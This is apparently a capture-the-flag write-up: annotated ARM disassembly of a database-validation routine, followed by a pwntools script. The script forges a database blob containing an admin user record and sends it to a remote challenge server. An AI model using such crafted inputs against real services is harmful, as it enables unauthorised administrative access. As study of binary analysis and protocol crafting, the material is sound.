__text:00000B72 loc_B72 ; CODE XREF: _validate_database+6Ej
__text:00000B72 LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B74 LDRH R0, [R0,#8]
__text:00000B76 CMP R0, #4
__text:00000B78 BGE loc_B84
__text:00000B7A MOVS R0, #0
__text:00000B80 STR R0, [SP,#0x2C+var_C]
__text:00000B82 B loc_EXIT
COLUMNS
USHORT [database+8] <= 0x10
__text:00000B84 loc_B84 ; CODE XREF: _validate_database+80j
__text:00000B84 LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B86 LDRH R0, [R0,#8]
__text:00000B88 CMP R0, #0x10
__text:00000B8A BLE loc_B96
__text:00000B8C MOVS R0, #0
__text:00000B92 STR R0, [SP,#0x2C+var_C]
__text:00000B94 B loc_EXIT
COLUMNS
R0 = database.columns * sizeof(column)
__text:00000B96 loc_B96 ; CODE XREF: _validate_database+92j
__text:00000B96 LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B98 LDRH R0, [R0,#8]
__text:00000B9A MOVS R1, #0x11 ; SIZEOF COLUMN
__text:00000BA0 MULS R0, R1
R0 = (total column bytes) + ARG2
__text:00000BA2 LDR R1, [SP,#0x2C+TOTAL_BYTES]
__text:00000BA4 ADD R0, R1
if sizeof COLUMN_HEADER + COLUMN_BYTES > BUFFERSIZE
EXIT
; this check is what makes the column-type reads in the loop below safe
__text:00000BA6 STR R0, [SP,#0x2C+TOTAL_BYTES]
__text:00000BA8 LDR R0, [SP,#0x2C+ARG1_BUFFERSIZE]
__text:00000BAA LDR R1, [SP,#0x2C+TOTAL_BYTES]
__text:00000BAC CMP R0, R1
__text:00000BAE BCS loc_BBA
__text:00000BB0 MOVS R0, #0
__text:00000BB6 STR R0, [SP,#0x2C+var_C]
__text:00000BB8 B loc_EXIT
R0 = 0
R1 = ARG0 ; database
R1 = database.column_data
__text:00000BBA loc_BBA ; CODE XREF: _validate_database+B6j
__text:00000BBA MOVS R0, #0
__text:00000BC0 STR R0, [SP,#0x2C+COLUMNSIZE_CUMULATIVE]
__text:00000BC2 LDR R1, [SP,#0x2C+SAVED_ARG0]
__text:00000BC4 ADDS R1, #0xC
__text:00000BC6 STR R1, [SP,#0x2C+COLUMN_DATA]
__text:00000BC8 STR R0, [SP,#0x2C+COLUMN_NUMBER]
__text:00000BCA
; ------ LOOOOOP
if COLUMN_NUMBER > NUM_COLUMNS:
break
; (BCS: unsigned COLUMN_NUMBER >= NUM_COLUMNS breaks)
__text:00000BCA loc_BCA ; CODE XREF: _validate_database+108j
__text:00000BCA LDR R0, [SP,#0x2C+COLUMN_NUMBER]
__text:00000BCC LDR R1, [SP,#0x2C+P_DATABASE]
__text:00000BCE LDRH R1, [R1,#8]
__text:00000BD0 CMP R0, R1
__text:00000BD2 BCS loc_C02
if COLUMN_SIZE(COLUMN) == 0
EXIT
; (_col_size returns 0 for any type byte > 7, so unknown types are rejected)
__text:00000BD4 LDR R0, [SP,#0x2C+COLUMN_DATA]
__text:00000BD6 BL _col_size
__text:00000BDA STR R0, [SP,#0x2C+COLUMN_SIZE]
__text:00000BDC LDR R0, [SP,#0x2C+COLUMN_SIZE]
__text:00000BDE CMP R0, #0
__text:00000BE0 BNE loc_BEC
__text:00000BE2 MOVS R0, #0
__text:00000BE8 STR R0, [SP,#0x2C+var_C]
__text:00000BEA B loc_EXIT
COLUMNSIZE_CUMULATIVE += COLUMN_SIZE
__text:00000BEC loc_BEC ; CODE XREF: _validate_database+E8j
__text:00000BEC LDR R0, [SP,#0x2C+COLUMN_SIZE]
__text:00000BEE LDR R1, [SP,#0x2C+COLUMNSIZE_CUMULATIVE]
__text:00000BF0 ADD R0, R1
__text:00000BF2 STR R0, [SP,#0x2C+COLUMNSIZE_CUMULATIVE]
pCOLUMN_DATA += sizeof COLUMN
__text:00000BF4 LDR R0, [SP,#0x2C+COLUMN_DATA]
__text:00000BF6 ADDS R0, #0x11 ; SIZEOF COLUMN
__text:00000BF8 STR R0, [SP,#0x2C+COLUMN_DATA]
COLUMN_NUMBER++
__text:00000BFA LDR R0, [SP,#0x2C+COLUMN_NUMBER]
__text:00000BFC ADDS R0, #1
__text:00000BFE STR R0, [SP,#0x2C+COLUMN_NUMBER]
CONTINUE LOOOOOOOP
__text:00000C00 B loc_BCA
; -------- END LOOOOOOP
TOTAL_BYTES += COLUMNSIZE_CUMULATIVE * NUM_ROWS
; With columns <= 0x10, rows <= 0x1000 and a maximum width of 0x20 per column
; (_col_size), the product is at most 0x10*0x20*0x1000 = 0x200000, so the
; 32-bit multiply and the add below cannot wrap around.
__text:00000C02 loc_C02 ; CODE XREF: _validate_database+DAj
__text:00000C02 LDR R0, [SP,#0x2C+COLUMNSIZE_CUMULATIVE]
__text:00000C04 LDR R1, [SP,#0x2C+P_DATABASE]
__text:00000C06 LDRH R1, [R1,#0xA]
__text:00000C08 MULS R0, R1
__text:00000C0A LDR R1, [SP,#0x2C+TOTAL_BYTES]
__text:00000C0C ADD R0, R1
__text:00000C0E STR R0, [SP,#0x2C+TOTAL_BYTES]
IF BUFFERSIZE < TOTAL_BYTES
EXIT
__text:00000C10 LDR R0, [SP,#0x2C+ARG1_BUFFERSIZE]
__text:00000C12 LDR R1, [SP,#0x2C+TOTAL_BYTES]
__text:00000C14 CMP R0, R1
__text:00000C16 BCS loc_C22
__text:00000C18 MOVS R0, #0
__text:00000C1E STR R0, [SP,#0x2C+var_C]
__text:00000C20 B loc_EXIT
Database is OK!
__text:00000C22 loc_C22 ; CODE XREF: _validate_database+11Ej
__text:00000C22 MOVS R0, #1
__text:00000C28 STR R0, [SP,#0x2C+var_C]
__text:00000C2A
Database NOT OK!
; (loc_EXIT is the shared exit for both outcomes; var_C holds 1 = OK, 0 = rejected)
__text:00000C2A loc_EXIT ; CODE XREF: _validate_database+26j
__text:00000C2A ; _validate_database+40j ...
__text:00000C2A LDR R0, [SP,#0x2C+var_C]
__text:00000C2C ADD SP, SP, #0x24
__text:00000C2E POP {R7,PC}
__text:00000C2E ; End of function _validate_database
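#!/usr/bin/env python
"""Build a database blob in the format read by _validate_database/_check_login and send it.

Layout (mirrors the disassembly above):
  header      12 bytes: magic 'WOLO', version 1, uint16 column count, uint16 row count
  column table one 0x11-byte record per column: 1 type byte + 16-byte NUL-padded name
  rows        each row is the concatenation of its fixed-width fields, in column order
The message is sent as a 4-byte length prefix followed by the blob.
"""
from pwn import *
from collections import OrderedDict
context(log_level='debug')

# Type ids as decoded by _col_size's jump table.
ColumnTypeId = {
    'int8': 0,
    'int16': 1,
    'int32': 2,
    'int64': 3,
    'sz8': 4,
    'sz16': 5,
    'sz32': 6,
    'timestamp': 7
}
# Field widths in bytes. These must agree with _col_size for every type used,
# otherwise the server walks the rows with a different stride than we wrote.
# 'timestamp' is type 7, which _col_size reports as 4 bytes.
ColumnSizes = {
    'int8': 1,
    'int16': 2,
    'int32': 4,
    'int64': 8,
    'sz8': 8,
    'sz16': 16,
    'sz32': 32,
    'timestamp': 4
}
# Column order is what both the column table and each row are emitted in, so
# build the OrderedDict from a sequence of pairs: OrderedDict({...}) would take
# whatever order the dict literal happens to iterate in on Python 2.
Columns = OrderedDict([
    ('USERNAME', 'sz16'),
    ('PASSWORD', 'sz32'),
    ('ADMIN', 'int8'),
    ('ISAWESOME', 'int8'),
    ('TRASH', 'int32'),
])
# _validate_database requires at least 4 rows; the same row is repeated.
Rows = [
    {
        'USERNAME': 'captainfalcon',
        'PASSWORD': 'fc03329505475dd4be51627cc7f0b1f1',
        'ADMIN': 1,
        'ISAWESOME': 1,
        'TRASH': 0
    },
] * 4

Header = p32(0x4F4C4F57)  # Magic 'WOLO'
Header += p32(1)  # Version
Header += p16(len(Columns))  # nColumns (header offset 8)
Header += p16(len(Rows))  # nRows (header offset 0xA)

ColumnData = ''
for Column, Type in Columns.items():
    ColumnData += p8(ColumnTypeId[Type])
    # Name field is exactly 16 bytes: pad with NULs, truncate if longer.
    ColumnData += Column.ljust(0x10, '\x00')[:0x10]

RowData = ''
for Row in Rows:
    for Column, Type in Columns.items():
        Size = ColumnSizes[Type]
        Data = flat(Row[Column])
        # Pad or truncate to the field width so the row stride stays exact.
        Data = Data.ljust(Size, '\x00')[:Size]
        RowData += Data

Message = Header + ColumnData + RowData
print(hexdump(Header))
print(hexdump(ColumnData, 17))  # 17-byte groups line up with the column records
print(hexdump(RowData))

r = remote('54.164.98.39', 2510)
r.send(p32(len(Message)))  # length prefix
r.send(Message)
print(r.recvall())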